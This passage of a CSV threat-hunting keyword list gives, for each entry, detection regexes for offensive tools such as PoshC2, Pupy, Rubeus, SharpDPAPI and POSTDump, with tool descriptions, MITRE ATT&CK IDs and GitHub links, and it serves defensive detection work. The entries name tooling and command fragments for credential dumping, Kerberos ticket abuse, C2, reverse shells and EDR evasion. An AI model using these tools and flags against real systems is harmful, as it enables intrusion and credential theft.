tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "* popcalc64.bin *",".{0,1000}\spopcalc64\.bin\s.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. 
Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "* PopUpRansom*",".{0,1000}\sPopUpRansom.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","N/A","N/A","5","440","106","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z" "* --port 1337*",".{0,1000}\s\-\-port\s1337.{0,1000}","offensive_tool_keyword","empire","The Empire Multiuser GUI is a graphical interface to the Empire post-exploitation Framework","T1059.003 - T1071.001 - T1543.003 - T1041 - T1562.001","TA0002 - TA0010 - TA0011 ","N/A","N/A","C2","https://github.com/EmpireProject/Empire-GUI","1","0","N/A","10","10","483","144","2022-03-10T11:34:46Z","2018-04-20T21:59:52Z" "* port_reuse.py*",".{0,1000}\sport_reuse\.py.{0,1000}","offensive_tool_keyword","Venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","N/A","10","10","1925","344","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z" "* port_scan.py*",".{0,1000}\sport_scan\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* port-states.nse*",".{0,1000}\sport\-states\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* PoshC2 *",".{0,1000}\sPoshC2\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* -PoshC2Dir *",".{0,1000}\s\-PoshC2Dir\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with 
post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* -PoshC2Dir *",".{0,1000}\s\-PoshC2Dir\s.{0,1000}","offensive_tool_keyword","poshc2","PoshC2 is a proxy aware C2 framework used to aid penetration testers with red teaming. post-exploitation and Lateral Movement. PoshC2 is primarily written in Python3 and follows a modular format to enable users to add their own modules and tools. allowing an extendible and flexible C2 framework. Out-of-the-box PoshC2 comes PowerShell/C# and Python implants with payloads written in PowerShell v2 and v4. C++ and C# source code. a variety of executables. DLLs and raw shellcode in addition to a Python2 payload. These enable C2 functionality on a wide range of devices and operating systems. including Windows. 
*nix and OSX.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* PostDump.exe*",".{0,1000}\sPostDump\.exe.{0,1000}","offensive_tool_keyword","POSTDump","perform minidump of LSASS process using few technics to avoid detection","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/YOLOP0wn/POSTDump","1","0","N/A","10","3","294","35","2023-11-19T10:17:40Z","2023-09-13T11:28:51Z" "* PotentiallyCrackableAccounts.ps1*",".{0,1000}\sPotentiallyCrackableAccounts\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* powercat.ps1",".{0,1000}\spowercat\.ps1","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* powercat.ps1*",".{0,1000}\spowercat\.ps1.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "* Powermad.ps1*",".{0,1000}\sPowermad\.ps1.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "* PowerTools.ps1*",".{0,1000}\sPowerTools\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "* PowerUp.ps1*",".{0,1000}\sPowerUp\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* ppid_spoofing.exe*",".{0,1000}\sppid_spoofing\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - 
T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* PPLmedic.exe*",".{0,1000}\sPPLmedic\.exe.{0,1000}","offensive_tool_keyword","PPLmedic","Dump the memory of any PPL with a Userland exploit chain","T1003 - T1055 - T1564.001","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/itm4n/PPLmedic","1","0","N/A","8","4","317","34","2023-03-17T15:58:24Z","2023-03-10T12:07:01Z" "* pptp-version.nse*",".{0,1000}\spptp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* preauthscan /users:*",".{0,1000}\spreauthscan\s\/users\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* prepare.sh shell/mod_*.htaccess*",".{0,1000}\sprepare\.sh\sshell\/mod_.{0,1000}\.htaccess.{0,1000}","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","0","N/A","10","10","991","191","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" "* --preset all -o syscalls_all*",".{0,1000}\s\-\-preset\sall\s\-o\ssyscalls_all.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1143","156","2023-12-23T11:07:19Z","2022-03-07T18:56:21Z" "* --preset common -o syscalls_common*",".{0,1000}\s\-\-preset\scommon\s\-o\ssyscalls_common.{0,1000}","offensive_tool_keyword","SysWhispers3","SysWhispers on Steroids - AV/EDR evasion via direct system calls.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/klezVirus/SysWhispers3","1","0","N/A","N/A","10","1143","156","2023-12-23T11:07:19Z","2022-03-07T18:56:21Z" "* PrincipalsAllowedToDelegateToAccount *",".{0,1000}\sPrincipalsAllowedToDelegateToAccount\s.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* printerbug.py*",".{0,1000}\sprinterbug\.py.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* printing the golden data, format inspired by Responder :D*",".{0,1000}\sprinting\sthe\sgolden\sdata,\sformat\sinspired\sby\sResponder\s\:D.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","N/A","10","10","1281","200","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z" "* Priv_Esc.sh*",".{0,1000}\sPriv_Esc\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","7","605","96","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z" "* --priv-esc*",".{0,1000}\s\-\-priv\-esc.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation 
tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* privesc.ps1*",".{0,1000}\sprivesc\.ps1.{0,1000}","offensive_tool_keyword","Privesc","Windows PowerShell script that finds misconfiguration issues which can lead to privilege escalation","T1068 - T1548 - T1082 - T1078","TA0004","N/A","N/A","Privilege Escalation","https://github.com/enjoiz/Privesc","1","0","N/A","10","5","469","90","2023-03-06T10:27:00Z","2015-11-19T13:22:01Z" "* PrivescCheck.ps1*",".{0,1000}\sPrivescCheck\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* Process spawned with stolen token!*",".{0,1000}\sProcess\sspawned\swith\sstolen\stoken!.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. 
Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "* processinjection.exe*",".{0,1000}\sprocessinjection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* proxychains *",".{0,1000}\sproxychains\s.{0,1000}","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0042","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","8","10","6069","591","2024-01-02T11:23:26Z","2011-02-25T12:27:05Z" "* ProxyStream *Stowaway*",".{0,1000}\sProxyStream\s.{0,1000}Stowaway.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","10","10","2419","382","2024-04-11T05:50:18Z","2019-11-15T03:25:50Z" "* ps /target:*.xml /unprotect*",".{0,1000}\sps\s\/target\:.{0,1000}\.xml\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","1058","200","2024-02-24T01:14:36Z","2018-08-22T17:39:31Z" "* 
psexec_merged.bin*",".{0,1000}\spsexec_merged\.bin.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","0","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "* psgetsys.ps1*",".{0,1000}\spsgetsys\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* psgetsys.ps1*",".{0,1000}\spsgetsys\.ps1.{0,1000}","offensive_tool_keyword","psgetsystem","getsystem via parent process using ps1 & embeded c#","T1134 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/psgetsystem","1","0","N/A","10","4","320","83","2023-10-26T07:13:08Z","2018-02-02T11:28:22Z" "* PSLessExec.exe*",".{0,1000}\sPSLessExec\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "* ptt /ticket:*",".{0,1000}\sptt\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* ptunnel-ng*",".{0,1000}\sptunnel\-ng.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "* --publickey * --ecmdigits 25 --verbose --private*",".{0,1000}\s\-\-publickey\s.{0,1000}\s\-\-ecmdigits\s25\s\-\-verbose\s\-\-private.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* --publickey * --uncipherfile ./ciphered\_file*",".{0,1000}\s\-\-publickey\s.{0,1000}\s\-\-uncipherfile\s\.\/ciphered\\_file.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* puppet-naivesigning.nse*",".{0,1000}\spuppet\-naivesigning\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* PupyCredentials*",".{0,1000}\sPupyCredentials.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* pupylib.*",".{0,1000}\spupylib\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* pupysh.py*",".{0,1000}\spupysh\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. 
cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* PupySocketStream*",".{0,1000}\sPupySocketStream.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* PupyTCPClient*",".{0,1000}\sPupyTCPClient.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* PupyTCPServer*",".{0,1000}\sPupyTCPServer.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* PupyWebServer*",".{0,1000}\sPupyWebServer.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* PupyWebSocketClient*",".{0,1000}\sPupyWebSocketClient.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* PupyWebSocketServer*",".{0,1000}\sPupyWebSocketServer.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
